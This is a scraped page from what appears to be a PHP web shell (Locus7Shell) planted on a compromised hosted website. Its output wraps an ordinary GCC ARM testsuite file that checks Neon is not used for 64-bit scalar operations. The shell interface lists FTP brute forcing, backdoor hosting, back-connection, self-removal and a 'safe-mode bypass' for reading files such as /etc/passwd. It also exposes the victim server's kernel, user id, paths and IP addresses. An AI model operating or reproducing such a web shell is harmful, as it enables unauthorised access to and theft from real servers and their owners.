Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/arm/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     neon-for-64bits-1.c (1.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Check that Neon is *not* used by default to handle 64-bits scalar
   operations.  */

/* { dg-do compile } */
/* { dg-require-effective-target arm_neon_ok } */
/* { dg-options "-O2" } */
/* { dg-add-options arm_neon } */

typedef long long i64;
typedef unsigned long long u64;
typedef unsigned int u32;
typedef int i32;

/* Unary operators */
#define UNARY_OP(name, op) \
  void unary_##name(u64 *a, u64 *b) { *a = op (*b + 0x1234567812345678ULL) ; }

/* Binary operators */
#define BINARY_OP(name, op) \
  void binary_##name(u64 *a, u64 *b, u64 *c) { *a = *b op *c ; }

/* Unsigned shift */
#define SHIFT_U(name, op, amount) \
  void ushift_##name(u64 *a, u64 *b, int c) { *a = *b op amount; }

/* Signed shift */
#define SHIFT_S(name, op, amount) \
  void sshift_##name(i64 *a, i64 *b, int c) { *a = *b op amount; }

UNARY_OP(not, ~)

BINARY_OP(add, +)
BINARY_OP(sub, -)
BINARY_OP(and, &)
BINARY_OP(or, |)
BINARY_OP(xor, ^)

SHIFT_U(right1, >>, 1)
SHIFT_U(right2, >>, 2)
SHIFT_U(right5, >>, 5)
SHIFT_U(rightn, >>, c)

SHIFT_S(right1, >>, 1)
SHIFT_S(right2, >>, 2)
SHIFT_S(right5, >>, 5)
SHIFT_S(rightn, >>, c)

/* { dg-final {scan-assembler-times "vmvn" 0} }  */
/* { dg-final {scan-assembler-times "vadd" 0} }  */
/* { dg-final {scan-assembler-times "vsub" 0} }  */
/* { dg-final {scan-assembler-times "vand" 0} }  */
/* { dg-final {scan-assembler-times "vorr" 0} }  */
/* { dg-final {scan-assembler-times "veor" 0} }  */
/* { dg-final {scan-assembler-times "vshr" 0} }  */

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0062 ]--